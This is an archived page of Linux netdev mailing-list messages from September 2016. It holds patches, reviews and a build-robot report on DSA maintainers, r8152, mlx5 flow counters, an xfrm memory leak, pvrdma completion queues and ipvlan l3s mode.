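uint16_t tci_modify(uint16_t tci, uint16_t vid, uint8_t prio)
{
	assert(vid <= VLAN_VID_MASK && prio <= 7);

	tci = (uint16_t)((tci & ~VLAN_VID_MASK) | vid);
	if (prio) {
		tci &= (uint16_t)~VLAN_PRIO_MASK;
		tci |= (uint16_t)(prio << VLAN_PRIO_SHIFT);
	}
	return tci;
}
```

One consequence visible in this sketch: since a zero priority means
"keep the existing bits", a tag cannot be rewritten to priority 0 this
way.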

cheers,
jamal


* skb_splice_bits() and large chunks in pipe (was Re: xfs_file_splice_read: possible circular locking dependency detected)
From: Al Viro @ 2016-09-18 19:31 UTC (permalink / raw)
  To: Linus Torvalds
  Cc: Jens Axboe, Nick Piggin, linux-fsdevel, netdev, Eric Dumazet
In-Reply-To: <20160917190023.GA8039@ZenIV.linux.org.uk>

FWIW, I'm not sure if skb_splice_bits() can't land us in trouble; fragments
might come from compound pages and I'm not entirely convinced that we won't
end up with coalesced fragments putting more than PAGE_SIZE into a single
pipe_buffer.  And that could badly confuse a bunch of code.

Can that legitimately happen?  If so, we'll need to audit quite a few
->splice_write()-related codepaths; FUSE, in particular, is very likely
to be unhappy with that kind of stuff, and it's not the only place where
we might count upon never seeing e.g. longer than PAGE_SIZE chunks in
bio_vec.  It shouldn't be all that hard to fix, but if the whole thing
is simply impossible, I would rather avoid that round of RTFS at the moment...

Comments?


* [PATCH v2 net-next] MAINTAINERS: Add an entry for the core network DSA code
From: Andrew Lunn @ 2016-09-18 19:17 UTC (permalink / raw)
  To: David Miller; +Cc: Florian Fainelli, Vivien Didelot, netdev, Andrew Lunn

The core distributed switch architecture code currently does not have
a MAINTAINERS entry, which results in some contributions not landing
in the right people's inboxes.

Signed-off-by: Andrew Lunn <andrew@lunn.ch>
---
v2: Add include/net/dsa.h and drivers/net/dsa/

 MAINTAINERS | 9 +++++++++
 1 file changed, 9 insertions(+)

diff --git a/MAINTAINERS b/MAINTAINERS
index ce80b36aab69..8c8a2e40bdbb 100644
--- a/MAINTAINERS
+++ b/MAINTAINERS
@@ -8169,6 +8169,15 @@ S:	Maintained
 W:	https://fedorahosted.org/dropwatch/
 F:	net/core/drop_monitor.c
 
+NETWORKING [DSA]
+M:	Andrew Lunn <andrew@lunn.ch>
+M:	Vivien Didelot <vivien.didelot@savoirfairelinux.com>
+M:	Florian Fainelli <f.fainelli@gmail.com>
+S:	Maintained
+F:	net/dsa/
+F:	include/net/dsa.h
+F:	drivers/net/dsa/
+
 NETWORKING [GENERAL]
 M:	"David S. Miller" <davem@davemloft.net>
 L:	netdev@vger.kernel.org
-- 
2.9.3


* Re: [PATCH net-next 2/3] r8152: support ECM mode
From: kbuild test robot @ 2016-09-18 18:37 UTC (permalink / raw)
  To: Hayes Wang
  Cc: kbuild-all-JC7UmRfGjtg, netdev-u79uwXL29TY76Z2rM5mHXA,
	nic_swsd-Rasf1IRRPZFBDgjK7y7TUQ,
	linux-kernel-u79uwXL29TY76Z2rM5mHXA,
	linux-usb-u79uwXL29TY76Z2rM5mHXA, Hayes Wang
In-Reply-To: <1394712342-15778-217-Taiwan-albertk-Rasf1IRRPZFBDgjK7y7TUQ@public.gmane.org>

[-- Attachment #1: Type: text/plain, Size: 2088 bytes --]

Hi Hayes,

[auto build test ERROR on net-next/master]

url:    https://github.com/0day-ci/linux/commits/Hayes-Wang/r8152-configuration-setting/20160907-192351
config: i386-randconfig-x0-09182136 (attached as .config)
compiler: gcc-6 (Debian 6.2.0-3) 6.2.0 20160901
reproduce:
        # save the attached .config to linux build tree
        make ARCH=i386 

All errors (new ones prefixed by >>):

   drivers/built-in.o: In function `r815x_mdio_write':
>> r8152.c:(.text+0x19a664): undefined reference to `usbnet_write_cmd'
   drivers/built-in.o: In function `r815x_mdio_read':
>> r8152.c:(.text+0x19a6ae): undefined reference to `usbnet_read_cmd'
   drivers/built-in.o: In function `rtl_usbnet_disconnect':
>> r8152.c:(.text+0x19aaa9): undefined reference to `usbnet_disconnect'
   drivers/built-in.o: In function `rtl_ecm_bind':
>> r8152.c:(.text+0x19c143): undefined reference to `usbnet_cdc_bind'
   r8152.c:(.text+0x19c175): undefined reference to `usbnet_write_cmd'
>> r8152.c:(.text+0x19c1e8): undefined reference to `usbnet_cdc_unbind'
   drivers/built-in.o: In function `rtl_usbnet_suspend':
>> r8152.c:(.text+0x19d3ab): undefined reference to `usbnet_suspend'
   drivers/built-in.o: In function `rtl_usbnet_probe':
>> r8152.c:(.text+0x19d7bd): undefined reference to `usbnet_probe'
   drivers/built-in.o: In function `rtl_usbnet_reset_resume':
>> r8152.c:(.text+0x19ec33): undefined reference to `usbnet_resume'
   drivers/built-in.o: In function `rtl_usbnet_resume':
   r8152.c:(.text+0x19ec68): undefined reference to `usbnet_resume'
   drivers/built-in.o: In function `lkdtm_rodata_do_nothing':
>> (.rodata+0x3538c): undefined reference to `usbnet_cdc_unbind'
   drivers/built-in.o: In function `lkdtm_rodata_do_nothing':
>> (.rodata+0x3539c): undefined reference to `usbnet_manage_power'
   drivers/built-in.o: In function `lkdtm_rodata_do_nothing':
>> (.rodata+0x353a0): undefined reference to `usbnet_cdc_status'

---
0-DAY kernel test infrastructure                Open Source Technology Center
https://lists.01.org/pipermail/kbuild-all                   Intel Corporation

[-- Attachment #2: .config.gz --]
[-- Type: application/gzip, Size: 30778 bytes --]


* Re: [PATCH net 1/3] net/mlx5: Fix flow counter bulk command out mailbox allocation
From: Leon Romanovsky @ 2016-09-18 18:02 UTC (permalink / raw)
  To: Or Gerlitz
  Cc: David S. Miller, netdev, Tariq Toukan, Hadar Har-Zion, Amir Vadai,
	Roi Dayan
In-Reply-To: <1474212029-1052-2-git-send-email-ogerlitz@mellanox.com>

[-- Attachment #1: Type: text/plain, Size: 1648 bytes --]

On Sun, Sep 18, 2016 at 06:20:27PM +0300, Or Gerlitz wrote:
> From: Roi Dayan <roid@mellanox.com>
>
> The FW command output length should be only the length of struct
> mlx5_cmd_fc_bulk out field. Failing to do so will cause the memcpy
> call which is invoked later in the driver to write over wrong memory
> address and corrupt kernel memory which results in random crashes.
>
> This bug was found using the kernel address sanitizer (kasan).
>
> Fixes: a351a1b03bf1 ('net/mlx5: Introduce bulk reading of flow counters')
> Signed-off-by: Roi Dayan <roid@mellanox.com>
> Signed-off-by: Or Gerlitz <ogerlitz@mellanox.com>
> ---
>  drivers/net/ethernet/mellanox/mlx5/core/fs_cmd.c | 4 ++--
>  1 file changed, 2 insertions(+), 2 deletions(-)
>
> diff --git a/drivers/net/ethernet/mellanox/mlx5/core/fs_cmd.c b/drivers/net/ethernet/mellanox/mlx5/core/fs_cmd.c
> index 9134010..287ade1 100644
> --- a/drivers/net/ethernet/mellanox/mlx5/core/fs_cmd.c
> +++ b/drivers/net/ethernet/mellanox/mlx5/core/fs_cmd.c
> @@ -425,11 +425,11 @@ struct mlx5_cmd_fc_bulk *
>  mlx5_cmd_fc_bulk_alloc(struct mlx5_core_dev *dev, u16 id, int num)
>  {
>  	struct mlx5_cmd_fc_bulk *b;
> -	int outlen = sizeof(*b) +
> +	int outlen =
>  		MLX5_ST_SZ_BYTES(query_flow_counter_out) +
>  		MLX5_ST_SZ_BYTES(traffic_counter) * num;
>
> -	b = kzalloc(outlen, GFP_KERNEL);
> +	b = kzalloc(sizeof(*b) + outlen, GFP_KERNEL);
>  	if (!b)
>  		return NULL;
                  ^^^^^^^^^ very controversial decision.
In the code flow mlx5_fc_stats_query -> mlx5_cmd_fc_bulk_alloc -> kzalloc, the
failure path is handled the same way as the success scenario.

It is not related to the proposed patch.
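
For reference, the sizing rule that the quoted patch restores can be
sketched in user space as below. This is a simplified model, not the
driver code: struct bulk is a stand-in for struct mlx5_cmd_fc_bulk, and
hdr_sz and per_counter_sz are made-up parameters standing in for the
MLX5_ST_SZ_BYTES() values. The allocation covers the header plus the
mailbox, while outlen describes the mailbox only.

```c
#include <assert.h>
#include <stdlib.h>

struct bulk {                   /* stand-in for struct mlx5_cmd_fc_bulk */
	unsigned short id;
	int num;
	int outlen;             /* length of out[] only, without the header */
	unsigned char out[];    /* command output mailbox */
};

/* hdr_sz and per_counter_sz are hypothetical stand-ins for the real sizes. */
struct bulk *bulk_alloc(unsigned short id, int num,
			int hdr_sz, int per_counter_sz)
{
	struct bulk *b;
	int outlen = hdr_sz + per_counter_sz * num;   /* mailbox only */

	assert(num >= 0 && hdr_sz >= 0 && per_counter_sz >= 0);

	b = calloc(1, sizeof(*b) + (size_t)outlen);   /* header + mailbox */
	if (!b)
		return NULL;

	b->id = id;
	b->num = num;
	b->outlen = outlen;
	return b;
}
```

If outlen also included sizeof(*b), anything copying outlen bytes into
out[] would run past the end of the allocation, which matches the kind
of corruption the commit message describes.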

>
> --
> 2.3.7
>

[-- Attachment #2: signature.asc --]
[-- Type: application/pgp-signature, Size: 819 bytes --]


* Re: [PATCH iproute2] vxlan: allow specifying multiple default destinations
From: Tomasz Chmielewski @ 2016-09-18 17:41 UTC (permalink / raw)
  To: netdev

> Signed-off-by: Mike Rapoport <mike.rapoport@ravellosystems.com>
> ---
> This patch depends on the pending changes to ip/iplink_vxlan.c as
> well as on IPv6 support in vxlan. I'll rebase and resend it once all
> the changes to vxlan are merged.

Was this one (and related) ever merged?

Full thread here:

http://marc.info/?t=136688790500006&r=1&w=4



Tomasz Chmielewski
https://lxadm.com


* Re: [PATCH net] xfrm: Fix memory leak of aead algorithm name
From: Rami Rosen @ 2016-09-18 17:39 UTC (permalink / raw)
  To: Ilan Tayari; +Cc: Steffen Klassert, Herbert Xu, netdev@vger.kernel.org
In-Reply-To: <AM4PR0501MB19404B000E4D3A2CF3CB80DEDBF50@AM4PR0501MB1940.eurprd05.prod.outlook.com>

Acked-by: Rami Rosen <roszenrami@gmail.com>

On 18 September 2016 at 10:42, Ilan Tayari <ilant@mellanox.com> wrote:
> commit 1a6509d99122 ("[IPSEC]: Add support for combined mode algorithms")
> introduced aead. The function attach_aead kmemdup()s the algorithm
> name during xfrm_state_construct().
> However this memory is never freed.
> Implementation has since been slightly modified in
> commit ee5c23176fcc ("xfrm: Clone states properly on migration")
> without resolving this leak.
> This patch adds a kfree() call for the aead algorithm name.
>
> Fixes: 1a6509d99122 ("[IPSEC]: Add support for combined mode algorithms")
> Signed-off-by: Ilan Tayari <ilant@mellanox.com>
> ---
>  net/xfrm/xfrm_state.c | 1 +
>  1 file changed, 1 insertion(+)
>
> diff --git a/net/xfrm/xfrm_state.c b/net/xfrm/xfrm_state.c
> index 9895a8c..a30f898d 100644
> --- a/net/xfrm/xfrm_state.c
> +++ b/net/xfrm/xfrm_state.c
> @@ -332,6 +332,7 @@ static void xfrm_state_gc_destroy(struct xfrm_state *x)
>  {
>         tasklet_hrtimer_cancel(&x->mtimer);
>         del_timer_sync(&x->rtimer);
> +       kfree(x->aead);
>         kfree(x->aalg);
>         kfree(x->ealg);
>         kfree(x->calg);
> --
> 1.8.3.1
>


* Re: [net-next PATCH v3 2/3] e1000: add initial XDP support
From: Jesper Dangaard Brouer @ 2016-09-18 17:25 UTC (permalink / raw)
  To: Eric Dumazet
  Cc: Alexei Starovoitov, John Fastabend, bblanco, jeffrey.t.kirsher,
	davem, xiyou.wangcong, intel-wired-lan, u9012063, netdev, brouer
In-Reply-To: <1473723968.18970.111.camel@edumazet-glaptop3.roam.corp.google.com>

On Mon, 12 Sep 2016 16:46:08 -0700
Eric Dumazet <eric.dumazet@gmail.com> wrote:

> This XDP_TX thing was one of the XDP marketing stuff, but there is
> absolutely no documentation on it, warning users about possible
> limitations/outcomes.

I will take care of documentation for the XDP project.

-- 
Best regards,
  Jesper Dangaard Brouer
  MSc.CS, Principal Kernel Engineer at Red Hat
  Author of http://www.iptv-analyzer.org
  LinkedIn: http://www.linkedin.com/in/brouer


* [PATCH net] xfrm: Fix memory leak of aead algorithm name
From: Ilan Tayari @ 2016-09-18  7:42 UTC (permalink / raw)
  To: Steffen Klassert, Herbert Xu; +Cc: netdev@vger.kernel.org

commit 1a6509d99122 ("[IPSEC]: Add support for combined mode algorithms")
introduced aead. The function attach_aead kmemdup()s the algorithm
name during xfrm_state_construct().
However this memory is never freed.
Implementation has since been slightly modified in
commit ee5c23176fcc ("xfrm: Clone states properly on migration")
without resolving this leak.
This patch adds a kfree() call for the aead algorithm name.

Fixes: 1a6509d99122 ("[IPSEC]: Add support for combined mode algorithms")
Signed-off-by: Ilan Tayari <ilant@mellanox.com>
---
 net/xfrm/xfrm_state.c | 1 +
 1 file changed, 1 insertion(+)

diff --git a/net/xfrm/xfrm_state.c b/net/xfrm/xfrm_state.c
index 9895a8c..a30f898d 100644
--- a/net/xfrm/xfrm_state.c
+++ b/net/xfrm/xfrm_state.c
@@ -332,6 +332,7 @@ static void xfrm_state_gc_destroy(struct xfrm_state *x)
 {
 	tasklet_hrtimer_cancel(&x->mtimer);
 	del_timer_sync(&x->rtimer);
+	kfree(x->aead);
 	kfree(x->aalg);
 	kfree(x->ealg);
 	kfree(x->calg);
-- 
1.8.3.1


* Re: [PATCH v4 09/16] IB/pvrdma: Add support for Completion Queues
From: Leon Romanovsky @ 2016-09-18 17:07 UTC (permalink / raw)
  To: Yuval Shaia
  Cc: Adit Ranadive, dledford@redhat.com, linux-rdma@vger.kernel.org,
	pv-drivers, netdev@vger.kernel.org, linux-pci@vger.kernel.org,
	Jorgen S. Hansen, Aditya Sarwade, George Zhang, Bryan Tan
In-Reply-To: <20160915073611.GA3851@yuval-lap.uk.oracle.com>

[-- Attachment #1: Type: text/plain, Size: 3004 bytes --]

On Thu, Sep 15, 2016 at 10:36:12AM +0300, Yuval Shaia wrote:
> Hi Adit,
> Please see my comments inline.
>
> Besides that I have no more comment for this patch.
>
> Reviewed-by: Yuval Shaia <yuval.shaia@oracle.com>
>
> Yuval
>
> On Thu, Sep 15, 2016 at 12:07:29AM +0000, Adit Ranadive wrote:
> > On Wed, Sep 14, 2016 at 05:43:37 -0700, Yuval Shaia wrote:
> > > On Sun, Sep 11, 2016 at 09:49:19PM -0700, Adit Ranadive wrote:
> > > > +
> > > > +static int pvrdma_poll_one(struct pvrdma_cq *cq, struct pvrdma_qp **cur_qp,
> > > > +			   struct ib_wc *wc)
> > > > +{
> > > > +	struct pvrdma_dev *dev = to_vdev(cq->ibcq.device);
> > > > +	int has_data;
> > > > +	unsigned int head;
> > > > +	bool tried = false;
> > > > +	struct pvrdma_cqe *cqe;
> > > > +
> > > > +retry:
> > > > +	has_data = pvrdma_idx_ring_has_data(&cq->ring_state->rx,
> > > > +					    cq->ibcq.cqe, &head);
> > > > +	if (has_data == 0) {
> > > > +		if (tried)
> > > > +			return -EAGAIN;
> > > > +
> > > > +		/* Pass down POLL to give physical HCA a chance to poll. */
> > > > +		pvrdma_write_uar_cq(dev, cq->cq_handle | PVRDMA_UAR_CQ_POLL);
> > > > +
> > > > +		tried = true;
> > > > +		goto retry;
> > > > +	} else if (has_data == PVRDMA_INVALID_IDX) {
> > >
> > > I didn't go through the entire life cycle of the RX ring's head and tail, but
> > > you need to make sure that the PVRDMA_INVALID_IDX error is a recoverable one,
> > > i.e. that there is a chance the next call to pvrdma_poll_one will be fine.
> > > Otherwise it is an endless loop.
> >
> > We have never run into this issue internally but I don't think we can recover here
>
> I briefly reviewed the life cycle of the RX ring's head and tail and didn't
> catch any suspicious place that might corrupt it.
> So I'm glad to see that you never encountered this case.
>
> > in the driver. The only way to recover would be to destroy and recreate the CQ
> > which we shouldn't do since it could be used by multiple QPs.
>
> Agree.
> But don't they hit the same problem too?
>
> > We don't have a way yet to recover in the device. Once we add that this check
> > should go away.
>
> To be honest, I have no idea how to do that - I was expecting driver vendors
> to come up with ideas :)
> I once came up with an idea to force a restart of the driver, but it was
> rejected.
>
> >
> > The reason I returned an error value from poll_cq in v3 was to break the possible
> > loop so that it might give clients a chance to recover. But since poll_cq is not expected
> > to fail I just log the device error here. I can revert to that version if you want to break
> > the possible loop.
>
> Clients (ULPs) cannot recover from this case. They do not even check the
> reason for the error and treat any error as -EAGAIN.

It is because poll_one is not expected to fail.

>
> > --
> > To unsubscribe from this list: send the line "unsubscribe linux-rdma" in
> > the body of a message to majordomo@vger.kernel.org
> > More majordomo info at  http://vger.kernel.org/majordomo-info.html

[-- Attachment #2: signature.asc --]
[-- Type: application/pgp-signature, Size: 819 bytes --]


* Re: [PATCHv4 next 3/3] ipvlan: Introduce l3s mode
From: David Ahern @ 2016-09-18 16:57 UTC (permalink / raw)
  To: Mahesh Bandewar, netdev; +Cc: Eric Dumazet, David Miller, Mahesh Bandewar
In-Reply-To: <1474055959-12565-1-git-send-email-mahesh@bandewar.net>

On 9/16/16 1:59 PM, Mahesh Bandewar wrote:
> From: Mahesh Bandewar <maheshb@google.com>
> 
> In a typical IPvlan L3 setup, the master is in the default-ns and
> each slave is in a different (slave) ns. In this setup, egress
> packet processing for traffic originating from a slave-ns will
> hit all NF_HOOKs in the slave-ns as well as the default-ns. However,
> the same is not true for ingress processing. All these NF_HOOKs are
> hit only in the slave-ns, skipping them in the default-ns.
> IPvlan in L3 mode is restrictive and if admins want to deploy
> iptables rules in default-ns, this asymmetric data path makes it
> impossible to do so.
> 
> This patch makes use of the l3_rcv() (added as part of l3mdev
> enhancements) to perform input route lookup on RX packets without
> changing the skb->dev and then uses nf_hook at NF_INET_LOCAL_IN
> to change the skb->dev just before handing over skb to L4.

Today's l3 mode only allows netfilter Rx rules on ipvlan devices in slave-ns since skb->dev is changed to ipvlan device and the namespace crossing happens in rx-handler.

This new l3s mode only allows Rx rules on the parent devices (eg., eth1) in the default-ns since skb->dev stays as parent device until the NF_HOOK is run. Specifically, you can't put rules on eth1 and ipvl0 since the packet never goes through L3 with the ipvlan device set?

So the 'symmetric' part is with respect to the parent device in the default-ns.

Also, there is no longer an explicit namespace crossing; that happens via the route lookup and setting dst on the skb. I guess for this use case it is ok.

> 
> Signed-off-by: Mahesh Bandewar <maheshb@google.com>
> CC: David Ahern <dsa@cumulusnetworks.com>
> ---
>  Documentation/networking/ipvlan.txt |  7 ++-
>  drivers/net/Kconfig                 |  1 +
>  drivers/net/ipvlan/ipvlan.h         |  6 +++
>  drivers/net/ipvlan/ipvlan_core.c    | 94 +++++++++++++++++++++++++++++++++++++
>  drivers/net/ipvlan/ipvlan_main.c    | 87 +++++++++++++++++++++++++++++++---
>  include/uapi/linux/if_link.h        |  1 +
>  6 files changed, 188 insertions(+), 8 deletions(-)


Reviewed-by: David Ahern <dsa@cumulusnetworks.com>


